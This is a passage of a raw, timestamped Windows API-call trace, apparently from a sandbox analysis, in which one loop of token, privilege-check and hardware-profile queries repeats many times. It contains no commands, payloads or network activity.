ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.741] SetLastError (dwErrCode=0x522) [0084.741] CloseHandle (hObject=0x114) returned 1 [0084.741] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.741] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.741] GetLastError () returned 0x578 [0084.741] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.741] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.741] GetCurrentThread () returned 0xfffffffe [0084.741] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.741] GetLastError () returned 0x3f0 [0084.741] GetCurrentProcess () returned 0xffffffff [0084.741] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.741] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.741] SetLastError (dwErrCode=0x522) [0084.741] CloseHandle (hObject=0x114) returned 1 [0084.741] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.741] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.741] GetLastError () returned 0x578 [0084.741] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.741] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.741] GetCurrentThread () returned 0xfffffffe [0084.741] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.741] GetLastError () returned 0x3f0 [0084.741] GetCurrentProcess () returned 0xffffffff [0084.741] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.741] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.741] SetLastError (dwErrCode=0x522) [0084.741] CloseHandle (hObject=0x114) returned 1 [0084.741] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.741] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.741] GetLastError () returned 0x578 [0084.741] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.741] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.741] GetCurrentThread () returned 0xfffffffe [0084.741] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.741] GetLastError () returned 0x3f0 [0084.741] GetCurrentProcess () returned 0xffffffff [0084.741] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.741] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.742] SetLastError (dwErrCode=0x522) [0084.742] CloseHandle (hObject=0x114) returned 1 [0084.742] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.742] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.742] GetLastError () returned 0x578 [0084.742] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.742] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.742] GetCurrentThread () returned 0xfffffffe [0084.742] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.742] GetLastError () returned 0x3f0 [0084.742] GetCurrentProcess () returned 0xffffffff [0084.742] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.742] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.742] SetLastError (dwErrCode=0x522) [0084.742] CloseHandle (hObject=0x114) returned 1 [0084.742] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.742] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.742] GetLastError () returned 0x578 [0084.742] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.742] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.742] GetCurrentThread () returned 0xfffffffe [0084.742] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.742] GetLastError () returned 0x3f0 [0084.742] GetCurrentProcess () returned 0xffffffff [0084.742] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.742] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.742] SetLastError (dwErrCode=0x522) [0084.742] CloseHandle (hObject=0x114) returned 1 [0084.742] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.742] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.742] GetLastError () returned 0x578 [0084.742] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.742] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.742] GetCurrentThread () returned 0xfffffffe [0084.742] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.742] GetLastError () returned 0x3f0 [0084.742] GetCurrentProcess () returned 0xffffffff [0084.742] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.742] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.742] SetLastError (dwErrCode=0x522) [0084.742] CloseHandle (hObject=0x114) returned 1 [0084.742] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.742] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.742] GetLastError () returned 0x578 [0084.742] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.742] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.742] GetCurrentThread () returned 0xfffffffe [0084.742] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.743] GetLastError () returned 0x3f0 [0084.743] GetCurrentProcess () returned 0xffffffff [0084.743] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.743] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.743] SetLastError (dwErrCode=0x522) [0084.743] CloseHandle (hObject=0x114) returned 1 [0084.743] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.743] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.743] GetLastError () returned 0x578 [0084.743] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.743] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.743] GetCurrentThread () returned 0xfffffffe [0084.743] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.743] GetLastError () returned 0x3f0 [0084.743] GetCurrentProcess () returned 0xffffffff [0084.743] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.743] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.743] SetLastError (dwErrCode=0x522) [0084.743] CloseHandle (hObject=0x114) returned 1 [0084.743] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.743] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.743] GetLastError () returned 0x578 [0084.743] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.743] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.743] GetCurrentThread () returned 0xfffffffe [0084.743] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.743] GetLastError () returned 0x3f0 [0084.743] GetCurrentProcess () returned 0xffffffff [0084.743] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.743] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.743] SetLastError (dwErrCode=0x522) [0084.743] CloseHandle (hObject=0x114) returned 1 [0084.743] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.743] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.743] GetLastError () returned 0x578 [0084.743] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.743] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.743] GetCurrentThread () returned 0xfffffffe [0084.743] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.743] GetLastError () returned 0x3f0 [0084.743] GetCurrentProcess () returned 0xffffffff [0084.743] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.743] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.743] SetLastError (dwErrCode=0x522) [0084.743] CloseHandle (hObject=0x114) returned 1 [0084.743] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.743] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.743] GetLastError () returned 0x578 [0084.744] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.744] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.744] GetCurrentThread () returned 0xfffffffe [0084.744] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.744] GetLastError () returned 0x3f0 [0084.744] GetCurrentProcess () returned 0xffffffff [0084.744] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.744] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.744] SetLastError (dwErrCode=0x522) [0084.744] CloseHandle (hObject=0x114) returned 1 [0084.744] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.744] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.744] GetLastError () returned 0x578 [0084.744] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.744] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.744] GetCurrentThread () returned 0xfffffffe [0084.744] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.744] GetLastError () returned 0x3f0 [0084.744] GetCurrentProcess () returned 0xffffffff [0084.744] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.744] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.744] SetLastError (dwErrCode=0x522) [0084.744] CloseHandle (hObject=0x114) returned 1 [0084.744] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.744] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.744] GetLastError () returned 0x578 [0084.744] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.744] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.744] GetCurrentThread () returned 0xfffffffe [0084.744] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.744] GetLastError () returned 0x3f0 [0084.744] GetCurrentProcess () returned 0xffffffff [0084.744] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.744] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.744] SetLastError (dwErrCode=0x522) [0084.744] CloseHandle (hObject=0x114) returned 1 [0084.744] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.744] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.744] GetLastError () returned 0x578 [0084.744] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.744] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.744] GetCurrentThread () returned 0xfffffffe [0084.744] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.744] GetLastError () returned 0x3f0 [0084.744] GetCurrentProcess () returned 0xffffffff [0084.744] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.744] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.744] SetLastError (dwErrCode=0x522) [0084.745] CloseHandle (hObject=0x114) returned 1 [0084.745] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.745] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.745] GetLastError () returned 0x578 [0084.745] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.745] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.745] GetCurrentThread () returned 0xfffffffe [0084.745] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.745] GetLastError () returned 0x3f0 [0084.745] GetCurrentProcess () returned 0xffffffff [0084.745] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.745] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.745] SetLastError (dwErrCode=0x522) [0084.745] CloseHandle (hObject=0x114) returned 1 [0084.745] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.745] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.745] GetLastError () returned 0x578 [0084.745] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.745] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.745] GetCurrentThread () returned 0xfffffffe [0084.745] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.745] GetLastError () returned 0x3f0 [0084.745] GetCurrentProcess () returned 0xffffffff [0084.745] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.745] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.745] SetLastError (dwErrCode=0x522) [0084.745] CloseHandle (hObject=0x114) returned 1 [0084.745] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.745] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.745] GetLastError () returned 0x578 [0084.745] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.745] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.745] GetCurrentThread () returned 0xfffffffe [0084.745] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.745] GetLastError () returned 0x3f0 [0084.745] GetCurrentProcess () returned 0xffffffff [0084.745] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.745] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.745] SetLastError (dwErrCode=0x522) [0084.745] CloseHandle (hObject=0x114) returned 1 [0084.745] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.745] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.745] GetLastError () returned 0x578 [0084.745] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.745] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.745] GetCurrentThread () returned 0xfffffffe [0084.745] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.745] GetLastError () returned 0x3f0 [0084.745] GetCurrentProcess () returned 0xffffffff [0084.745] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.746] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.746] SetLastError (dwErrCode=0x522) [0084.746] CloseHandle (hObject=0x114) returned 1 [0084.746] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.746] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.746] GetLastError () returned 0x578 [0084.746] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.746] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.746] GetCurrentThread () returned 0xfffffffe [0084.746] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.746] GetLastError () returned 0x3f0 [0084.746] GetCurrentProcess () returned 0xffffffff [0084.746] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.746] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.746] SetLastError (dwErrCode=0x522) [0084.746] CloseHandle (hObject=0x114) returned 1 [0084.746] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.746] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.746] GetLastError () returned 0x578 [0084.746] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.746] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.746] GetCurrentThread () returned 0xfffffffe [0084.746] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.746] GetLastError () returned 0x3f0 [0084.746] GetCurrentProcess () returned 0xffffffff [0084.746] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.746] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.746] SetLastError (dwErrCode=0x522) [0084.746] CloseHandle (hObject=0x114) returned 1 [0084.746] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.746] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.746] GetLastError () returned 0x578 [0084.746] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.746] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.746] GetCurrentThread () returned 0xfffffffe [0084.746] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.746] GetLastError () returned 0x3f0 [0084.746] GetCurrentProcess () returned 0xffffffff [0084.746] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.746] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.746] SetLastError (dwErrCode=0x522) [0084.746] CloseHandle (hObject=0x114) returned 1 [0084.746] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.746] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.746] GetLastError () returned 0x578 [0084.746] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.746] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.747] GetCurrentThread () returned 0xfffffffe [0084.747] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.747] GetLastError () returned 0x3f0 [0084.747] GetCurrentProcess () returned 0xffffffff [0084.747] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: 